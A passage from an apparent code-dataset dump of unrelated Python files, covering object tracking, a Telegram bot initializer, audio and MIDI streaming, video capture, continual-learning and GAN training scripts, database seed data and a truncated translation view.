= boxes\n ids = [max_id+x+1 for x in range(len(boxes))]\n max_id = max(ids)\n else:\n ids = [0 for _ in boxes]\n find_flag = [False for _ in pre_boxes]\n for i, box in enumerate(boxes):\n x1, y1 = int(box[0]), int(box[1])\n x2, y2 = int(box[0] + box[2]), int(box[1] + box[3])\n bbox1 = (x2-x1)*(y2-y1)\n for j, pre_box in enumerate(pre_boxes):\n if find_flag[j]:\n continue\n pre_x1, pre_y1 = int(pre_box[0]), int(pre_box[1])\n pre_x2, pre_y2 = int(pre_box[0] + pre_box[2]), int(pre_box[1] + pre_box[3])\n bbox2 = (pre_x2 - pre_x1) * (pre_y2 - pre_y1)\n inner_x1 = max(x1, pre_x1)\n inner_y1 = max(y1, pre_y1)\n inner_x2 = min(x2, pre_x2)\n inner_y2 = min(y2, pre_y2)\n inner_area = max(0, (inner_x2-inner_x1)) * max(0, (inner_y2-inner_y1))\n out_area = bbox1 + bbox2 - inner_area\n iou = inner_area/out_area\n if iou >= th:\n ids[i] = pre_ids[j]\n find_flag[j] = True\n break\n if j < len(pre_boxes)-1:\n continue\n max_id += 1\n ids[i] = max_id\n new_boxes.append(box)\n is_new = True\n assert len(new_boxes) <= len(boxes)\n return ids, is_new, new_boxes, max_id\n","sub_path":"tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274449539","text":"import sys\nimport pickle\n\nfrom telegram.ext import Updater, MessageHandler, Filters, CallbackContext\nfrom telegram import Update\n\n\nif len(sys.argv) > 2:\n print(\"Error: terlalu banyak argumen\")\n exit(1)\nelif len(sys.argv) < 2:\n print(\"Error: tidak ada token yang dimasukkan\")\n exit(1)\n\nTOKEN = sys.argv[1]\n\n\ndef on_message(update: Update, ctx: CallbackContext):\n with open(\"telegramdata\", 'wb') as f:\n data = {\n \"token\": TOKEN,\n \"chatid\": update.effective_chat.id\n }\n pickle.dump(data, f)\n print(\"Info: Sukses\")\n update.effective_chat.send_message(\"Inisialisasi Sukses\")\n exit(0)\n\n\nupdater = Updater(TOKEN)\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, on_message))\nprint(\"Silahkan kirimkan pesan teks ke bot anda di telegram\")\nupdater.start_polling()\n","sub_path":"telegraminit.py","file_name":"telegraminit.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"318341956","text":"def main():\n userName=input(\"Enter your name:\")\n userDescription=input(\"Describe yourself:\")\n print(userName)\n print(userDescription)\n\n html_str = \"\"\"\n \n \n \n
\n

\"\"\"+userName+\"\"\"

\n
\n
\"\"\"+userDescription+\"\"\"\n
\n \n\"\"\"\n\n Html_file = open(\"filename.html\", \"w\")\n Html_file.write(html_str)\n Html_file.close()\n\n\nmain()","sub_path":"HW4/htmloutput.py","file_name":"htmloutput.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628163174","text":"import html_to_markdown\nimport link_processing \n\nfrom markdown_file_processor import MarkdownFileProcessor\n\ndef main():\n\n path = \"C:\\\\Projects\\\\Python\\\\PlaylistProcessor\\\\\"\n\n input_path = path + \"\\\\Content\"\n existing_path = path + \"\\\\Existing\"\n\n html_to_markdown.translate_files_from_html_to_markdown(input_path, '.html')\n links = html_to_markdown.process_files_into_list_of_links(input_path)\n\n markdown_file_processor = MarkdownFileProcessor(existing_path)\n known_urls = markdown_file_processor.process_files()\n\n new_links = link_processing.find_new_links(links, known_urls)\n\n for link in new_links:\n print('- ', link)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cleanuplist.py","file_name":"cleanuplist.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"276329944","text":"import argparse\r\nfrom models.model_resnet import *\r\nfrom models.model_resnet18 import *\r\nimport myData.iDataset\r\nimport myData.iDataLoader\r\nfrom utils import *\r\nfrom sklearn.utils import shuffle\r\nimport trainer.trainer_warehouse\r\nimport trainer.evaluator\r\nfrom arguments import *\r\nfrom myData.data_warehouse import *\r\nfrom models.W_resnet import *\r\nimport torch.optim as optim\r\n\r\n\r\nargs = get_args()\r\n\r\n#seed\r\nseed = args.seed\r\nset_seed(seed)\r\n\r\n#set gpu\r\nGPU_NUM = 0 # 원하는 GPU 번호 입력\r\ndevice = torch.device(f'cuda:{GPU_NUM}' if torch.cuda.is_available() else 'cpu')\r\n\r\ntorch.cuda.set_device(device)\r\nprint(\"current cuda : \", torch.cuda.current_device())\r\n\r\nif device.type == 'cuda':\r\n print(torch.cuda.get_device_name(GPU_NUM))\r\n print('Memory Usage:')\r\n print('Allocated:', round(torch.cuda.memory_allocated(GPU_NUM) / 1024 ** 3, 1), 'GB')\r\n print('Cached: ', round(torch.cuda.memory_cached(GPU_NUM) / 1024 ** 3, 1), 'GB')\r\n\r\ndata = DatasetWH\r\ndataset = data.get_dataset(args.dataset)\r\n\r\n#shuffle_idx = shuffle(np.arange(dataset.classes), random_state=seed)\r\nshuffle_idx = None\r\n\r\ntasknum = (dataset.classes - args.start_classes) // args.step_size + 1\r\n\r\n#######################################################################dataset, dataloader, model decalare\r\nif args.dataset == 'CIFAR100' or args.dataset == 'CIFAR10':\r\n loader = None\r\n myNet = resnet32(num_classes=dataset.classes, tasknum=tasknum).cuda()\r\nelse:\r\n loader = dataset.loader\r\n myNet = wideresnet(depth=16, num_classes=200, widen_factor=2, dropRate=0.3).cuda()\r\n\r\n\r\ntrain_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'train',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach= args.trainer,\r\n )\r\n\r\nevaluate_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'train',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach= \"ft\",\r\n )\r\n\r\ntest_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.test_data,\r\n dataset.test_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'test',\r\n transform=dataset.test_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach= args.trainer,\r\n )\r\n\r\nresult_dataset_loaders = myData.iDataLoader.make_ResultLoaders(dataset.test_data,\r\n dataset.test_labels,\r\n dataset.classes,\r\n args.step_size,\r\n transform=dataset.test_transform,\r\n loader=loader,\r\n shuffle_idx = shuffle_idx,\r\n base_classes = args.start_classes\r\n )\r\n\r\n#only for the BiC\r\nbias_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'bias',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach=args.trainer\r\n )\r\n\r\ntrain_iterator = torch.utils.data.DataLoader(train_dataset_loader, batch_size=args.batch_size, shuffle=True,\r\n drop_last=True)\r\nevaluator_iterator = torch.utils.data.DataLoader(evaluate_dataset_loader, batch_size=args.batch_size, shuffle=True)\r\ntest_iterator = torch.utils.data.DataLoader(test_dataset_loader, batch_size=50, shuffle=False)\r\n#######################################################################################################################\r\n\r\n####################################################################################Set optimizer, trainer, evaluator\r\n\r\noptimizer = optim.SGD(myNet.parameters(), args.lr, momentum=0.9,\r\n weight_decay=5e-4, nesterov=True)\r\n\r\nif args.trainer == \"icarl\" :\r\n test_type = \"generativeClassifier\"\r\nelse :\r\n testType = \"trainedClassifier\"\r\n\r\nmyTrainer = trainer.trainer_warehouse.TrainerFactory.get_trainer(train_iterator, test_iterator, dataset, myNet, args, optimizer)\r\nmyEvaluator = trainer.evaluator.EvaluatorFactory.get_evaluator(testType, classes=dataset.classes)\r\nbic_Evaluator = trainer.evaluator.EvaluatorFactory.get_evaluator(\"bic\", classes=dataset.classes)\r\n#######################################################################################################################\r\n\r\n####################################################################################etc informaation\r\n\r\n\r\ntrain_start = 0\r\ntrain_end = args.start_classes\r\ntest_start = 0\r\ntest_end = args.start_classes\r\ntotal_epochs = args.nepochs\r\nschedule = np.array(args.schedule)\r\n\r\nresults = {}\r\n\r\nfor head in ['all', 'prev_new', 'task', 'cheat']:\r\n results[head] = {}\r\n results[head]['correct'] = []\r\n results[head]['correct_5'] = []\r\n results[head]['stat'] = []\r\n\r\nresults['task_soft_1'] = np.zeros((tasknum, tasknum))\r\nresults['task_soft_5'] = np.zeros((tasknum, tasknum))\r\n\r\n\r\ncorrect_list = []\r\nstat_list = []\r\n\r\ntask_confidence_list = []\r\nget_confidence = False\r\n\r\ntask_error = []\r\n\r\n#################Get Into Incremental Learning!###############################\r\nprint(\"datset : \", args.dataset, \"| trainer : \", args.trainer, \"| kdloss : \", args.KD, \" | triplet : \", args.triplet)\r\nfor t in range(tasknum):\r\n get_confidence = False\r\n\r\n correct = {} # record for correct\r\n stat = {} # record for statistics e.g. ep, enn ..\r\n\r\n lr = args.lr\r\n\r\n myTrainer.update_frozen_model()\r\n myTrainer.setup_training(lr)\r\n\r\n if t > 0 and args.triplet: #make class correlation matrix\r\n if args.dict_type == \"softmax\":\r\n myTrainer.make_class_dict()\r\n\r\n print(\"SEED:\", args.seed, \"MEMORY_BUDGET:\", args.memory_size, \"tasknum:\", t)\r\n\r\n for epoch in range(args.nepochs):\r\n myTrainer.update_lr(epoch, args.schedule)\r\n myTrainer.train(epoch, triplet=args.triplet)\r\n\r\n if epoch % 5 == 4:\r\n if args.trainer == \"icarl\":\r\n myEvaluator.update_moment(myTrainer.model, evaluator_iterator, args.step_size, t)\r\n if t == 0:\r\n get_confidence = False\r\n train_1 = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n test_1 = myEvaluator.evaluate(myTrainer.model, test_iterator, test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n\r\n print(\"*********CURRENT EPOCH********** : %d\" % epoch)\r\n print(\"Train Classifier top-1 (Softmax): %0.2f\" % train_1)\r\n print(\"Test Classifier top-1 (Softmax): \", test_1)\r\n\r\n else:\r\n if epoch == args.nepochs - 1 & get_confidence == True:\r\n get_confidence = False\r\n train_1, confidence = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n else:\r\n train_1 = myEvaluator.evaluate(myTrainer.model, evaluator_iterator, 0, train_end,\r\n get_confidence=get_confidence, tasknum=tasknum)\r\n\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n\r\n print(\"Train Classifier top-1 (Softmax): %0.2f\" % train_1)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if (epoch == args.anchor_update_epoch - 1) and t > 0 and args.triplet == True :\r\n myTrainer.make_class_Anchor(after_train=False) # save class anchor for next step\r\n\r\n if args.dict_update == True:\r\n if args.dict_type == \"softmax\":\r\n myTrainer.make_class_dict()\r\n else:\r\n myTrainer.make_class_dict_CS()\r\n\r\n if t > 0 and (args.trainer == 'wa' or args.trainer == \"CLT\"): #weight align for bias correction\r\n myTrainer.weight_align(new_wa=args.new_WA)\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if t > 0 and (args.trainer == 'eeil'): #balanced finutning fot EEIL\r\n myTrainer.balance_fine_tune()\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n print(\"Test Classifier top-1 (Softmax, ti_correct): %0.2f\" % correct['task_id_correct'])\r\n\r\n if args.trainer == 'bic' and t > 0:\r\n\r\n best_acc = 0\r\n\r\n bias_iterator = myData.iDataLoader.iterator(bias_dataset_loader, batch_size=args.batch_size, shuffle=True)\r\n\r\n print(myTrainer.bias_correction_layer.alpha)\r\n print(myTrainer.bias_correction_layer.beta)\r\n\r\n for e in range(args.nepochs * 2):\r\n myTrainer.train_bias_correction(bias_iterator)\r\n myTrainer.update_bias_lr(e, schedule)\r\n\r\n if e % 5 == (4):\r\n correct, stat = bic_Evaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end, myTrainer.bias_correction_layer,\r\n mode='test', step_size=args.step_size)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n correct, stat = bic_Evaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end, myTrainer.bias_correction_layer,\r\n mode='test', step_size=args.step_size)\r\n print(\"Test Classifier top-1 (Softmax, all): %0.2f\" % correct['all'])\r\n print(\"Test Classifier top-1 (Softmax, pre): %0.2f\" % correct['pre'])\r\n print(\"Test Classifier top-1 (Softmax, new): %0.2f\" % correct['new'])\r\n print(\"Test Classifier top-1 (Softmax, intra_pre): %0.2f\" % correct['intra_pre'])\r\n print(\"Test Classifier top-1 (Softmax, intra_new): %0.2f\" % correct['intra_new'])\r\n\r\n if args.triplet == True :\r\n if t > 0 :\r\n myTrainer.make_class_Anchor(after_train=False) # save class anchor for next step\r\n else :\r\n myTrainer.make_class_Anchor()\r\n\r\n if t > 0:\r\n correct, stat = myEvaluator.evaluate(myTrainer.model, test_iterator,\r\n test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n for head in ['all', 'pre', 'new', 'intra_pre', 'intra_new']:\r\n results['all']['correct'].append(correct[head])\r\n results['all']['stat'].append(stat['all'])\r\n\r\n else:\r\n test_1 = myEvaluator.evaluate(myTrainer.model, test_iterator, test_start, test_end,\r\n mode='test', step_size=args.step_size, tasknum=tasknum)\r\n print(\"Test Classifier top-1 (Softmax): \", test_1)\r\n for head in ['all']:\r\n results[head]['correct'].append(test_1)\r\n\r\n start = 0\r\n end = args.start_classes\r\n\r\n correct_list.append(correct)\r\n stat_list.append(stat)\r\n\r\n if args.triplet == True:\r\n torch.save(myNet.state_dict(),\r\n './checkpoint/comparasion/' + 'base_{}_{}_tri{}_trilam{}_newWA{}_{}_{}_{}.pt'.format(args.trainer,\r\n args.dataset,\r\n args.triplet,\r\n args.triplet_lam,\r\n args.new_WA,\r\n tasknum, t, args.model))\r\n else:\r\n torch.save(myNet.state_dict(),\r\n './checkpoint/comparasion/' + '20_base_{}_{}_tri{}_newWA{}_{}_{}_{}.pt'.format(args.trainer, args.dataset,\r\n args.triplet, args.new_WA,\r\n tasknum, t, args.model))\r\n\r\n myTrainer.increment_classes(mode=\"Bal\", bal=\"None\", memory_mode=None)\r\n\r\n evaluate_dataset_loader.update_exemplar()\r\n evaluate_dataset_loader.task_change()\r\n\r\n # for bic\r\n bias_dataset_loader.update_exemplar()\r\n bias_dataset_loader.task_change()\r\n\r\n train_end = train_end + args.step_size\r\n test_end = test_end + args.step_size\r\n\r\nprint(args)\r\nprint()\r\nprint(\"print acc\")\r\nfor i in range(tasknum):\r\n if i == 0:\r\n print(test_1)\r\n else:\r\n print(correct_list[i][\"all\"])\r\n\r\nprint()\r\nprint(\"print all\")\r\nfor i in range(tasknum):\r\n if i == 0:\r\n print(test_1)\r\n else:\r\n print(correct_list[i][\"intra_pre\"], \" \", correct_list[i][\"intra_new\"], \" \", correct_list[i][\"pre\"], \" \",\r\n correct_list[i][\"new\"], \" \", correct_list[i][\"task_id_correct\"])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206518186","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport statsmodels.api as sm\n\ndf = pd.read_csv(\"data/simple.csv\")\nintercept = \"intercept\"\ndf[intercept] = 1\nresults = sm.OLS(df[\"b\"], df[[intercept, \"a\"]]).fit()\nprint(results.summary())\n","sub_path":"simple-sim.py","file_name":"simple-sim.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606434421","text":"#coding=utf-8\n\nimport tensorflow as tf\n\n# 创建一个变量,初始化为标量0\nstate = tf.Variable(0, name='counter')\n\n'''创建图'''\n# 创建一个constant op\none = tf.constant(1)\n# 创建一个add op\nnew_value = tf.add(state, one)\n# 创建一个assign op\nupdate = tf.assign(state, new_value)\n# 创建一个initialize_all_variables op\ninit_op = tf.initialize_all_variables()\n\n'''在会话中启动图默认图'''\nwith tf.Session() as sess:\n # 运行init op\n sess.run(init_op)\n # 运行op,更新state\n for _ in range(10):\n sess.run(update)\n # 获取结果\n print(sess.run(state))\n","sub_path":"practice_framework_tensorflow/04-使用变量实现一个简单的计数器.py","file_name":"04-使用变量实现一个简单的计数器.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"23418323","text":"import pyaudio\nimport Queue\nimport numpy\nimport threading\nimport time\nfrom audio_group import AudioGroup\nfrom audio_block import AudioBlock\nimport mido\n\nclass MidiThread(threading.Thread):\n def __init__(self):\n super(MidiThread, self).__init__()\n self.midi_queue = Queue.PriorityQueue()\n self.midi_output = mido.open_output(name=\"BlockAudio\", virtual=True)\n self.should_exit = False\n self.paused = False\n self.start()\n\n def run(self):\n item = None\n while not self.should_exit:\n if not self.paused:\n if item is None:\n try:\n item = self.midi_queue.get(block=False)\n except Queue.Empty:\n item = None\n if item:\n if item[0]<=time.time():\n self.midi_output.send(item[1])\n item = None\n time.sleep(.01)\n\n def close(self):\n self.should_exit = True\n if self.is_alive():\n self.join()\n\nclass AudioServer(threading.Thread):\n PaManager = None\n Servers = []\n DefaultBufferMult = .99\n\n @staticmethod\n def get_default():\n if AudioServer.Servers:\n return AudioServer.Servers[0]\n server = AudioServer()\n server.play()\n return server\n\n @staticmethod\n def close_all():\n while len(AudioServer.Servers)>0:\n server = AudioServer.Servers[0]\n server.close()\n del AudioServer.Servers[:]\n\n def __init__(self, buffer_mult=DefaultBufferMult, host_api_name=\"jack\"):\n super(AudioServer, self).__init__()\n self.midi_thread = MidiThread()\n self.pa_manager = pyaudio.PyAudio()\n\n self.output_device_index = None\n for i in xrange(self.pa_manager.get_host_api_count()):\n host_api_info = self.pa_manager.get_host_api_info_by_index(i)\n if host_api_info[\"name\"].lower().find(host_api_name.lower()) == -1:\n continue\n for j in xrange(host_api_info[\"deviceCount\"]):\n device_info = self.pa_manager.get_device_info_by_host_api_device_index(i, j)\n if device_info[\"maxOutputChannels\"]<2:\n continue\n self.output_device_index = device_info[\"index\"]\n\n self.audio_queue = Queue.Queue()\n self.block_positions_queue = Queue.Queue()\n self.audio_group = AudioGroup()\n self.should_exit = False\n self.paused = False\n self.set_buffer_mult(buffer_mult)\n self.stream = None\n AudioServer.Servers.append(self)\n self.start()\n\n def play(self, block=None):\n self.paused = False\n if block:\n block.play()\n self.audio_group.play()\n\n def add_block(self, block):\n self.audio_group.add_block(block)\n\n def remove_block(self, block):\n self.audio_group.remove_block(block)\n\n def get_latency(self):\n return self.stream.get_output_latency()\n\n def set_buffer_mult(self, mult):\n self.buffer_mult = mult\n buffer_time = AudioBlock.FramesPerBuffer/float(AudioBlock.SampleRate)\n self.period = max(buffer_time*self.buffer_mult, .001)\n\n def run(self):\n self.stream = self.pa_manager.open(\n format=pyaudio.paFloat32,\n channels=AudioBlock.ChannelCount,\n rate= int(AudioBlock.SampleRate),\n output=True,\n frames_per_buffer = AudioBlock.FramesPerBuffer,\n stream_callback=self.stream_callback,\n output_device_index=self.output_device_index)\n self.audio_group.play()\n last_time = 0\n block_positions = None\n played_at = None\n while not self.should_exit:\n if block_positions is None:\n try:\n block_positions, played_at = self.block_positions_queue.get(block=False)\n except Queue.Empty:\n pass\n if block_positions and played_at<=time.time():\n for block, pos in block_positions:\n block.play_pos = pos\n block_positions = None\n\n if (time.time()-last_time)>self.period and not self.paused:\n audio_message = self.audio_group.get_samples(AudioBlock.FramesPerBuffer)\n if audio_message is not None:\n if audio_message.samples is not None:\n self.audio_queue.put(audio_message, block=True)\n\n last_time = time.time()\n time.sleep(self.period)\n self.stream.stop_stream()\n self.stream.close()\n\n def stream_callback(self, in_data, frame_count, time_info, status):\n if self.paused:\n data = self.audio_group.blank_data.copy()\n else:\n try:\n audio_message = self.audio_queue.get(block=False)\n data = audio_message.samples\n if data is None:\n data = self.audio_group.blank_data.copy()\n if audio_message.midi_messages:\n for midi_message in audio_message.midi_messages:\n self.midi_thread.midi_queue.put((\n time.time()+(midi_message.delay*1./AudioBlock.SampleRate),\n midi_message.mido_message\n ))\n if audio_message.block_positions:\n played_at = time_info[\"output_buffer_dac_time\"]+time.time()\n self.block_positions_queue.put(\n (audio_message.block_positions, played_at))\n\n self.audio_queue.task_done()\n except Queue.Empty:\n data = self.audio_group.blank_data.copy()\n return (data, pyaudio.paContinue)\n\n def close(self):\n self.midi_thread.close()\n self.should_exit = True\n if self.is_alive():\n self.join()\n AudioServer.Servers.remove(self)\n self.pa_manager.terminate()\n","sub_path":"src/audio_blocks/audio_server.py","file_name":"audio_server.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365137390","text":"import cv2\n\n\nclass MyVideoCapture:\n def __init__(self, video_source=0):\n self.video_source = video_source\n self.vid = None\n self.width = None\n self.height = None\n self.init()\n\n def init(self):\n # Open the video source\n self.vid = cv2.VideoCapture(self.video_source)\n if not self.vid.isOpened():\n print(\"Unable to open video source\")\n raise ValueError(\"Unable to open video source\", self.video_source)\n\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n if ret:\n # Return a boolean success flag and the current frame converted to BGR\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n print(\"Ret not found\")\n return (ret, None)\n else:\n print(\"get_frame Not opened\")\n return (None)\n\n # Release the video source when the object is destroyed\n def __del__(self):\n print(\"Camera capture released\")\n if self.vid.isOpened():\n self.vid.release()\n\n def release_camera(self):\n print(\"Camera capture released\")\n if self.vid.isOpened():\n self.vid.release()\n\n\nDEFAULT_VIDEO_CAPTURE = MyVideoCapture(0)\n","sub_path":"app_tools/my_video_capture.py","file_name":"my_video_capture.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204719536","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nlaunch file for traning and testing on Ascend 910\n\"\"\"\nimport os\nimport time\n\nimport mindspore\nfrom mindspore import context\nfrom mindspore.communication import init, get_group_size\nfrom mindspore.context import ParallelMode\n\nfrom src.modelarts_utils.config import config\nfrom src.modelarts_utils.moxing_adapter import moxing_wrapper\nfrom src.models.UGATIT import UGATIT\nfrom src.utils.tools import check_folder\n\nmindspore.set_seed(1)\n\n@moxing_wrapper()\ndef main():\n # parse arguments\n\n if config.distributed:\n if config.device_target == 'Ascend':\n device_id = int(os.getenv('DEVICE_ID'))\n device_num = int(os.getenv('RANK_SIZE'))\n context.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n device_id=device_id,\n save_graphs=config.save_graphs,\n save_graphs_path=config.graph_path)\n init()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL,\n gradients_mean=True,\n device_num=device_num)\n elif config.device_target == 'GPU':\n init(\"nccl\")\n context.reset_auto_parallel_context()\n device_num = get_group_size()\n context.set_auto_parallel_context(device_num=device_num, parallel_mode=ParallelMode.DATA_PARALLEL,\n gradients_mean=True)\n else:\n raise ValueError(\"Wrong device\", config.device_target)\n else:\n context.set_context(mode=context.GRAPH_MODE,\n device_target=config.device_target,\n device_id=int(config.device_id),\n save_graphs=config.save_graphs,\n save_graphs_path=config.graph_path)\n\n check_folder(os.path.join(config.output_path, config.dataset, 'model'))\n check_folder(os.path.join(config.output_path, config.dataset, 'img'))\n check_folder(os.path.join(config.output_path, config.dataset, 'test'))\n check_folder(config.graph_path)\n # open session\n gan = UGATIT(config)\n\n # build graph\n start_time = time.time()\n gan.build_model()\n print(\"build_model cost time: %.4f\" % (time.time() - start_time))\n\n gan.train()\n print(\" [*] Training finished!\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"research/cv/U-GAT-IT/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"224945307","text":"from models import Base, Role, User, Tag, Post, Post_Tag\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///flogger.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\nnewRole = Role(\n name=\"Administrator\",\n description=\"User with full control of the site.\"\n)\nsession.add(newRole)\n\nnewUser = User(\n username=\"Admin\",\n email=\"admin@site.com\",\n picture=\"placeholder.jpg\",\n role_id=1\n)\nsession.add(newUser)\n\nnewTag = Tag(name=\"Uncategorized\")\nsession.add(newTag)\n\nnewPost = Post(\n title=\"Welcome!\",\n body=\"Welcome to your blog!\",\n creator_id=1\n)\nsession.add(newPost)\n\nnewRel = Post_Tag(\n post_id=1,\n tag_id=1\n)\nsession.add(newRel)\n\nsession.commit()\n","sub_path":"dummy_data.py","file_name":"dummy_data.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"178052550","text":"import io\nimport math\nfrom enum import Enum\n\nimport six\nfrom google.cloud import translate_v2 as translate\nfrom google.cloud import vision\nfrom PIL import Image, ImageDraw\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom apps.menu import serializers\nfrom apps.menu.models import Menu\nfrom conf.settings import MEDIA_ROOT\n\n\nclass FeatureType(Enum):\n PAGE = 1\n BLOCK = 2\n PARA = 3\n WORD = 4\n SYMBOL = 5\n\n\ndef translate_text_print(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n if isinstance(text, six.binary_type):\n text = text.decode(\"utf-8\")\n\n # Text can also be a sequence of strings, in which case this method\n # will return a sequence of results for each text.\n result = translate_client.translate(text, target_language=target)\n\n print(u\"Text: {}\".format(result[\"input\"]))\n print(u\"Translation: {}\".format(result[\"translatedText\"]))\n print(u\"Detected source language: \\\n {}\".format(result[\"detectedSourceLanguage\"]))\n\n\ndef translate_all_text(target, text):\n \"\"\"Translates text into the target language.\n\n Target must be an ISO 639-1 language code.\n See https://g.co/cloud/translate/v2/translate-reference#supported_languages\n \"\"\"\n\n translate_client = translate.Client()\n\n result_text = []\n\n # Text can also be a sequence of strings, in which 